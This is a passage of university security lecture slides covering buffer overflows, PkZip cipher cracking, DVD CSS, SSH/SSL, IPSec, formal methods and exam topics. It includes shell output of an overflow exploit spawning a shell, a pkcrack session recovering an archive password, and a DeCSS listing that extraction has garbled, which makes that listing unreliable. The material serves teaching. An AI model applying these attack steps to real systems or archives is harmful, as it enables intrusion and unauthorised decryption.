[hugh@pnp176-44 programs]$ ./vulnerable $EGG
Argument is ????????...???????
sh-2.05b$

We are now within the vulnerable program process, but running the sh shell program, instead of the vulnerable program.
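A bounded version of vulnerable.c, added here as an example (it is not from the original notes): the copy checks the argument against the 512-byte buffer and rejects over-long input instead of writing past the end. The names copy_argument and try_argument_of_length are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 512  /* same size as buffer[] in vulnerable.c */

/*
 * Bounded replacement for strcpy (buffer, argv[1]).
 * Returns 0 and copies src (including its NUL) when it fits in dst_size bytes.
 * Returns -1 and leaves dst as an empty string when src is NULL or too long.
 * Over-long input is rejected, not truncated, so the caller never works on
 * a silently shortened value.
 */
int copy_argument(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;

    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Measure src, but never look further than dst could hold. */
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len == dst_size)          /* no room left for the terminating NUL */
        return -1;

    memcpy(dst, src, len + 1);    /* len + 1 <= dst_size is guaranteed here */
    return 0;
}

/* Demonstration helper (hypothetical): build an argument of n 'A' characters
 * and report whether the bounded copy into a 512-byte buffer accepts it. */
int try_argument_of_length(size_t n)
{
    static char arg[2 * BUFFER_SIZE];
    char buffer[BUFFER_SIZE];

    if (n >= sizeof arg)
        return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return copy_argument(buffer, sizeof buffer, arg);
}

int main(int argc, char *argv[])
{
    char buffer[BUFFER_SIZE];

    if (argc < 2) {               /* vulnerable.c also dereferenced a missing argv[1] */
        fprintf(stderr, "usage: vulnerable <argument>\n");
        return 2;
    }
    if (copy_argument(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (limit %d bytes)\n", BUFFER_SIZE - 1);
        return 1;
    }
    printf("Argument is %s\n", buffer);
    return 0;
}
```

With this check the return address is never reached by the copy: the longest accepted argument is 511 bytes plus the terminating NUL.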


Using the buffer overflow attack

A server (say a web server) that expects a query, and returns a response.

A CGI/ASP or perl script inside a web server

A SUID root program on a UNIX system


Example attack - Blaster

Recently we have been having a series of attacks on Microsoft systems that are based on various buffer overflow problems.

The Blaster worm is described in the CERT advisory “CA-2003-20 W32/Blaster worm”:

The W32/Blaster worm exploits a vulnerability in Microsoft’s DCOM RPC interface as described in VU#568148 and CA-2003-16. Upon successful execution....


Example attack CRC-32 on ssh

http://razor.bindview.com/publish/advisories/adv ssh1crc.html


This session

• Buffer overflow attacks

• PkZip attack

• DVDs and the CSS

• SSH and SSL

• PGPfone


PkZip stream cipher

PkZip is for compressing files

PkZip can also scramble files when given a secret password.

Enciphering strategy is weak and can be cracked

http://citeseer.nj.nec.com/122586.html

Weakness in the (homegrown) ciphering algorithm


PkZip stream cipher

opo 144% pkcrack -C all.zip -c readme.doc -P plain.zip -p readme.doc
Files read. Starting stage 1 on Wed Sep 8 09:04:02 1999
Generating 1st generation of possible key2 421 values...done.
Found 4194304 possible key2-values.
Now we're trying to reduce these...
Done. Left with 18637 possible Values. bestOffset is 24.
Stage 1 completed. Starting stage 2 on Thu Sep 9 09:12:06 1999
Ta-daaaaa! key0=dda9e469, key1=96212999, key2=f9fc9651
Probabilistic test succeeded for 402 bytes.
Stage2 completed. Starting password search on Thu Sep 9 09:22:22 1999
Key: 73 65 63 72 65 74
Or as a string: 'secret' (without the enclosing single quotes)
Finished on Thu Sep 9 10:54:22 1999
opo 99%
opo 145% ./zipdecrypt dda9e469 96212999 f9fc9651 all.zip rr.zip
opo 146%

rr.zip contains the unencrypted version of the archive


PkZip stream cipher fix

The PkZip stream cipher is also susceptible to dictionary attacks, and so it is considered not suitable for secure encryption of data. The fix is:

Don’t use PkZip for security purposes.


This session

• Buffer overflow attacks

• PkZip attack

• DVDs and the CSS

• SSH and SSL

• PGPfone


DVD security

Content Scrambling System - data encryption scheme

Developed by commercial interests to stop copying... but

Easy to copy a DVD, but CSS prevents decrypting, changing and re-recording.

Details are trade secret.

Master set of 400 keys is stored on every DVD, and the DVD player uses these to generate a key needed to decrypt data from the disc.


DVD security

Linux users were excluded from access to CSS licenses because of the open-source nature of Linux.

In October 1999, hobbyists/hackers in Europe cracked the CSS algorithm

DVD industry players have been trying to prevent distribution of any software

The source code for decoding DVD is available on a T-shirt.


DVD security

The lesson to learn from this is that, once again, security-through-obscurity is a very poor strategy.

The source code and detailed descriptions for a CSS descrambler are available at:

http://www-2.cs.cmu.edu/~dst/DeCSS/Gallery/


DVD security

Description of the key/descrambling process:

First one must have a master key, which is unique to the DVD player manufacturer. It is also known as a player key. The player reads an encrypted disk key from the DVD, and uses its player key to decrypt the disk key. Then the player reads the encrypted title key for the file to be played. (The DVD will likely contain multiple files, typically 4 to 8, each with its own title key.) It uses the decrypted disk key (DK) to decrypt the title key. Finally, the decrypted title key, TK, is used to descramble the actual content.


DVD security

Confusion and diffusion...

#define m(i)(x[i]^s[i+84])< <unsigned char x[5],y,s[2048];main(n)for(read(0,x,5);read(0,s,n=2048);write(1,s ,n))if(s[y=s[13]%8+20]/16%4==1)int i=m(1)17^256+m(0)8,k=m(2)0,j=m(4)17^m(3)9^k *2-k%8^8,a=0,c=26;for(s[y]-=16;--c;j*=2)a=a*2^i&1,i=i/2^j&1< <24;for(j=127;++j<n ;c=c>y)c+=y=i^i/8^i> >4^i> >12,i=i> >8^y< <17,a^=a> >14,y=a^a*8^a< <6,a=a> >8^y< <9,k=s [j],k="7Wo~’G \216"[k&7]+2^"cr3sfw6v;*k+>/n."[k> >4]*2^k*257/8,s[j]=k^(k&k*2&34) *6^c+~y;


This session

• Buffer overflow attacks

• PkZip attack

• DVDs and the CSS

• SSH and SSL

• PGPfone


ssh

For logging in to a remote machine

Has secure encrypted communications, and...

You can’t snoop or sniff passwords.

TCP/IP connections can be forwarded over the secure channel.


ssh - proving identity

1. /etc/hosts.equiv: same user name? OK - log in!

2. ~/.rhosts: by user? OK - log in!

3. RSA: authentication using public-key cryptography.

4. TIS: trusted server to authenticate the user.

5. Passwords: password sent encrypted...


RSA key management

The file ~/.ssh/authorized_keys lists the public keys for logging in.

• Initially: ssh program tells the server which key pair it would like to use

• Challenge: server sends challenge encrypted with public key.

• Decrypt: client decrypts using private key. The challenge returned as proof
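The three steps above, written out with both sides of the exchange, as an added example that is not part of the original notes. It assumes constructed toy RSA keys (textbook primes, no padding, far too small for real use), hypothetical function names, and a proof that is simply the decrypted challenge, as the slide describes.

```c
#include <stdint.h>
#include <stdio.h>

typedef struct { uint64_t n, e; } pubkey;   /* one entry in authorized_keys */
typedef struct { uint64_t n, d; } privkey;  /* never leaves the client */

enum login_result { LOGIN_OK = 0, LOGIN_UNKNOWN_KEY = 1, LOGIN_BAD_PROOF = 2 };

/* Constructed toy key pairs. */
const pubkey  ALICE_PUB    = { 3233, 17 };    /* p = 61, q = 53 */
const privkey ALICE_PRIV   = { 3233, 2753 };
const pubkey  MALLORY_PUB  = { 2773, 17 };    /* p = 47, q = 59 */
const privkey MALLORY_PRIV = { 2773, 157 };

/* Server-side list standing in for ~/.ssh/authorized_keys: Alice only. */
const pubkey AUTHORIZED_KEYS[] = { { 3233, 17 } };

/* Square-and-multiply; safe from overflow while mod < 2^32. */
uint64_t modpow(uint64_t base, uint64_t exp, uint64_t mod)
{
    uint64_t result = 1;
    base %= mod;
    while (exp > 0) {
        if (exp & 1)
            result = (result * base) % mod;
        base = (base * base) % mod;
        exp >>= 1;
    }
    return result;
}

/* Step 1 (server): is the key the client names listed in authorized_keys? */
int key_is_authorized(const pubkey *offered)
{
    size_t i, count = sizeof AUTHORIZED_KEYS / sizeof AUTHORIZED_KEYS[0];
    for (i = 0; i < count; i++)
        if (AUTHORIZED_KEYS[i].n == offered->n && AUTHORIZED_KEYS[i].e == offered->e)
            return 1;
    return 0;
}

/* Step 2 (server): map a random value into 2..n-1 and encrypt it with the
 * public key. A real server takes random_value from a cryptographic RNG. */
uint64_t server_pick_challenge(const pubkey *k, uint64_t random_value)
{
    return random_value % (k->n - 2) + 2;
}

uint64_t server_encrypt_challenge(const pubkey *k, uint64_t challenge)
{
    return modpow(challenge, k->e, k->n);
}

/* Step 3 (client): decrypt with the private key and return the result. */
uint64_t client_answer(const privkey *k, uint64_t encrypted)
{
    return modpow(encrypted, k->d, k->n);
}

/* Whole exchange: the server learns only whether the proof matches. */
enum login_result attempt_login(const pubkey *offered, const privkey *client_key,
                                uint64_t random_value)
{
    uint64_t challenge, on_the_wire, proof;

    if (!key_is_authorized(offered))
        return LOGIN_UNKNOWN_KEY;
    challenge   = server_pick_challenge(offered, random_value);
    on_the_wire = server_encrypt_challenge(offered, challenge);
    proof       = client_answer(client_key, on_the_wire);
    return proof == challenge ? LOGIN_OK : LOGIN_BAD_PROOF;
}

int main(void)
{
    printf("alice, own key:            %d\n", attempt_login(&ALICE_PUB, &ALICE_PRIV, 63));
    printf("mallory, alice's pubkey:   %d\n", attempt_login(&ALICE_PUB, &MALLORY_PRIV, 63));
    printf("mallory, unlisted own key: %d\n", attempt_login(&MALLORY_PUB, &MALLORY_PRIV, 63));
    return 0;
}
```

Knowing the public key is not enough: the second case names a listed key but cannot decrypt the challenge, and the third is refused before any challenge is sent.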


Port forwarding

Secure shell supports TCP/IP port forwarding

For example - if we wanted to use a secure channel to our X display on the local machine, the proxy listens for connections on a port, forwards the connection request and any data over the secure channel, and makes a connection to the real X display from the SSH Terminal.


Secure Sockets Layer (SSL)

Netscape has protocol for data security - uses 128-bit keys.

data encryption, server authentication, message integrity, and optional client authentication

SSL is an open, nonproprietary protocol


UN-SSL

Netscape weakly seeds a random number generator

Someone who can snoop the network and has access to an account can discover seed

Expected search space similar to brute-forcing a 40-bit key


This session

• Buffer overflow attacks

• PkZip attack

• DVDs and the CSS

• SSH and SSL

• PGPfone


PGPfone


PGPfone

Speech compression and strong cryptography

Available in two versions:

1. An international version available outside America, and a prohibited import into America.

2. An American version available inside America, and a prohibited import out of America.

These two versions are also exactly the same! Restrictions on the import and export of munitions - strong cryptography is considered a munition.


PGPfone

Familiar encryption and key exchange parameters:

When initially setting up a link, Diffie-Hellman key exchange is used to ensure safety in the choice of an encryption key.


Chapter 11

Lecture 11 - Security


Last session

• Buffer overflow attacks

• PkZip attack

• DVDs and the CSS

• SSH and SSL

• PGPfone


This session

• Design principles

• Biometrics

• IPSec

• Formal methods

• Formal evaluation

• Exam


Design principles

Paper by Saltzer and Schroeder, summarized below:

• Economy of mechanism: Keep the design as simple and small as possible. (identd assumption)

• Fail-safe defaults: Base access decisions on permission rather than exclusion. This is conservative design. (mail server - mail only access)

• Complete mediation: Every access to every object must be checked for authority. (DNS cache poisoning)


Design principles

• Open design: The design should not be secret. (DVDs, Microsoft SAM hashes...)

• Separation of privilege: Two keys are better than one. No single event can compromise the system. (su - password and wheel group)

• Least privilege: Every program and every user of the system should operate using the least set of privileges necessary to complete the job. (Military need-to-know)


Design principles

• Least common mechanism: Minimize the amount of mechanism common to more than one user and depended on by all users. (supervisor or library).

• Psychological acceptability: Human interface easy to use.

In the textbook there are examples of the use of each of these design principles.


This session

• Design principles

• Biometrics

• IPSec

• Formal methods

• Formal evaluation

• Exam


Biometrics

Biometrics is the use of human physical characteristics to support authentication.


Biometrics - eyes


Minimal hardware biometrics

Voices - Record and process voice leading to either speaker verification or recognition.

Faces - Capture either a static or moving image of a face.

Keystrokes - capture a sequence of keystrokes, recording timing.

Combinations of characteristics may be used, but in general biometric techniques are not reliable on their own. Good second key for separation of privilege.


This session

• Design principles

• Biometrics

• IPSec

• Formal methods

• Formal evaluation

• Exam


IPSec

IPSec is a set of standards intended to support communication security between networked computers, particularly in the newer IPv6 (IP Next-Generation) network.

IPSec software is available in Windows2000, Linux, and on routers on the Internet.

http://www.faqs.org/rfcs/rfc2401.html

IPSec may be used in a range of ways.


IPSec VPN

ISP


IPSec point-to-point


IPSec network-to-network


IPSec headers

There are two types of header, one used for authentication, and the other used for encryption:

1. AH - the Authentication Header for data integrity, anti-replay and authentication

2. ESP - the Encapsulating Security Payload header, for confidentiality. ESP can also provide AH services.

Communicating parties agree on a Security Association (SA), one SA for each direction, and one SA for each type of communication.


Modes of operation

• An end-to-end SA - Transport mode

[Figure: transport-mode packets. AH: Original IPv6 hdr, AH, Transport segment (authenticated). ESP: Original IPv6 hdr, ESP, Transport segment, ESP (encrypted, authenticated).]


Modes of operation

• An SA between security gateways - Tunnel mode

[Figure: tunnel-mode packets. AH: New IPv6 hdr, AH, Original IPv6 hdr, Transport segment (authenticated). ESP: New IPv6 hdr, ESP, Original IPv6 hdr, Transport segment, ESP (encrypted, authenticated).]

SAs form a kind of distributed database.


This session

• Design principles

• Biometrics

• IPSec

• Formal methods

• Formal evaluation

• Exam


Formal methods

FM encompasses a wide range of techniques...

Model checking:

constructing formal models, with appropriate formal specifications.

Example is Promela and Spin.


Promela and spin

The language Promela is 'C' like, with an initialization procedure. It can model asynchronous or synchronous, deterministic or non-deterministic systems

Spin is the checker for Promela models

Assertions to test correctness of model:

assert(some boolean condition);

If condition not TRUE then assertion violated.


Temporal claims

We got here again without making any progress!

The support for temporal claims takes the form of:

Endstate labels - for determining valid endstates
Progress labels - claim no non-progress cycles
Never claims - impossible temporal assertions


Simple example

[Figure: processes A and B linked by the channels AtoB and BtoA, with the application channels Ain, Aout, Bin and Bout.]


Promela example

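init
{
    /* One-slot links between the two transfer processes */
    chan AtoB = [1] of { mtype, byte };
    chan BtoA = [1] of { mtype, byte };
    /* Two-slot links between each application and its transfer process */
    chan Ain = [2] of { mtype, byte };
    chan Bin = [2] of { mtype, byte };
    chan Aout = [2] of { mtype, byte };
    chan Bout = [2] of { mtype, byte };
    atomic {
        run application( Ain,Aout );
        run transfer( Aout,Ain,BtoA,AtoB );
        run transfer( Bout,Bin,AtoB,BtoA );
        run application( Bin,Bout )
    };
    AtoB!err(0)   /* start the exchange with an error message */
}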


Promela example

#define MAX 10
mtype = { ack, nak, err, next, accept }

proctype transfer( chan in, out, chin, chout )
{
    byte o,i;
    in?next(o);   /* fetch the first value to send */
    do
    :: chin?nak(i) -> out!accept(i); chout!ack(o)
    :: chin?ack(i) -> out!accept(i); in?next(o); chout!ack(o)
    :: chin?err(i) -> chout!nak(o)
    od
}


Promela example

proctype application( chan in, out )
{
    int i=0, j=0, last_i=0;
    do
    :: in?accept(i) ->
        assert( i==last_i );   /* values must arrive in order */
        if
        :: (last_i!=MAX) -> last_i = last_i+1
        :: (last_i==MAX)
        fi
    :: out!next(j) ->
        if
        :: (j!=MAX) -> j=j+1
        :: (j==MAX)
        fi
    od
}


Spin simulation


This session

• Design principles

• Biometrics

• IPSec

• Formal methods

• Formal evaluation

• Exam


Formal evaluation - TCSEC

TCSEC (The Orange book) was the first rating system for the security of products. It defined six different evaluation classes. The classes are:

• C1 - For same-level security access. Not currently used.

• C2 - Controlled access protection - users are individually accountable for their actions. Most OS manufacturers have C2 versions of the OS.

• B1 - Mandatory BLP policies - for more secure systems handling classified data.


Formal evaluation - TCSEC

• B2 - structured protection - mandatory access control for all objects in the system. Formal models.

• B3 - security domains - more controls, minimal complexity, provable consistency of model.

• A1 - Verified design - consistency proofs between model and specification.


Formal evaluation - ITSEC

From Dutch, English, French and German national security evaluation criteria.

Adaptable.

Sponsor determines operational requirements, threats and security objectives.

ITSEC specifies the interactions and documents between the sponsor and the evaluator.


ITSEC

Again there are various levels of evaluation: E0..E6, with E6 giving the highest level of assurance - it requires two independent formal verifications.

First certification of a smart-card system under E6.

The smart-cards are electronic purses - that is they carry value,

Forgery must be impossible.

The certification encompassed the communication with the card, as well as the software within the card, and at the bank.


Data Diode E6, BLP

Data Diode

High Security

Low security


This session

• Design principles

• Biometrics

• IPSec

• Formal methods

• Formal evaluation

• Exam


Exam

You can expect 12 pages - write on paper. Marks/50.

10 short answer questions worth 1 mark each

Longer questions on...

Encryption, Information, Models, Key systems


Exam

Modulo, primes, Fermat, Euler: general & specific

Symmetric cryptosystems: IC, DES, general & specific

Physical limits: general

Information theory: general & security-specific

Models: BLP, Biba - general & specific

Key systems: RSA, Kerberos, specific


Dr Robert Deng

Real World Applications of Network/Computer Security

Abstract: The lecture is on practical applications of network and computer security technology. Examples include virtual private networks, security solutions for e-banking, fair exchange of digital valuables over the Internet (e.g., electronic contract signing over a network and certified e-mail delivery) and techniques for user privacy protection in cyberspace.


Finally

This is my last lecture, so...

Good luck with the exam, and

Thanks for your attention

Good luck!


Contents

1 Lecture 1 - Introduction

2 Lecture 2 - Preliminaries

3 Lecture 3 - Preliminaries

4 Lecture 4 - Preliminaries


5 Lecture 5 - Preliminaries

6 Lecture 6 - Errors

7 Lecture 7 - Encryption

8 Lecture 8 - Protocols

9 Lecture 9 - System (in)security

10 Lecture 10 - More (in)security


11 Lecture 11 - Security
